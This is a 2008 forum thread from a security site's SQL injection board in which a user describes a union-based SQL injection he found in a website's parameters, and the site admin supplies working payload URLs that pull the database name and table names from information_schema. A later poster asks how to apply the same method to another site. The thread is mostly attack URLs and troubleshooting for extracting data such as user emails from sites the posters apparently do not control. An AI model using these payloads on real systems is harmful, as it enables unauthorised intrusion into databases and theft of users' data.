 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Found Sql Injection, Don't Know tables name's Help! |
 |
 Posted: Sun Oct 12, 2008 5:50 am |
 |
|
| Cablekid |
| Advanced user |
 |
|
| Joined: Jul 14, 2007 |
| Posts: 85 |
|
|
|
 |
|
 |
|
Alright i find an injection.
But i don't know how many tables their are or all of their names.
Alright i use to get this message, intill i just kept putting null,null,null
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
graphics_index.php on line 57
The used SELECT statements have a different number of columns
Then it shows the pages and it only had this message
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
graphics_index.php on line 57
So i guess i found the right number or of tables.
But my sql injection wont display any of the info from the db on the page?
The sql inejction is in the cat id
http://localhost.com/graphics_index.php?pageNum_lays=1&totalRows_lays=2707&cat=-3+UNION+ALL+SELECT+email,null,null,null,null,null,null,null,null,null+from+users |
|
|
|
|
|
|
|
|
| Posted: Sun Oct 12, 2008 5:05 pm |
|
|
| Cablekid |
| Advanced user |
|
|
| Joined: Jul 14, 2007 |
| Posts: 85 |
|
|
|
|
|
|
|
Okay! New Details found!
I found a different page, and the results this time show up in a txt box.
But my query dose not display a result, if i do
http://localhost.com/usercp.php?id=graphic_pending&editpend=-3+UNION+ALL+SELECT+null,null,null,null,null,null,null,null,null,version()
It says 5.0.67-log |
|
|
|
|
| Posted: Sun Oct 12, 2008 5:17 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You can use information_schema.
First fetch database name:
| Code: |
http://localhost.com/usercp.php?id=graphic_pending&editpend=-3+UNION+ALL+SELECT+null,null,null,null,null,null,null,null,null,DATABASE()
|
Then you can get table names one-by-one:
| Code: |
http://localhost.com/usercp.php?id=graphic_pending&editpend=-3+UNION+ALL+SELECT+null,null,null,null,null,null,null,null,null,table_name+FROM+information_schema.tables+WHERE+table_schema='database_name_here'+ORDER+BY+table_name+DESC+LIMIT+1,1
|
|
|
|
|
|
| Posted: Mon Oct 13, 2008 7:56 pm |
|
|
| Cablekid |
| Advanced user |
|
|
| Joined: Jul 14, 2007 |
| Posts: 85 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Oct 24, 2008 7:48 pm |
|
|
| musc |
| Beginner |
|
|
| Joined: Sep 24, 2008 |
| Posts: 3 |
|
|
|
|
|
|
|
| waraxe wrote: | You can use information_schema.
First fetch database name:
| Code: |
http://localhost.com/usercp.php?id=graphic_pending&editpend=-3+UNION+ALL+SELECT+null,null,null,null,null,null,null,null,null,DATABASE()
|
Then you can get table names one-by-one:
| Code: |
http://localhost.com/usercp.php?id=graphic_pending&editpend=-3+UNION+ALL+SELECT+null,null,null,null,null,null,null,null,null,table_name+FROM+information_schema.tables+WHERE+table_schema='database_name_here'+ORDER+BY+table_name+DESC+LIMIT+1,1
|
|
Hello.In a site with ipb,when i put that it showed me this error:
mySQL error: The used SELECT statements have a different number of columns
What can I do to get table names? |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 308
Members: 0
Total: 308
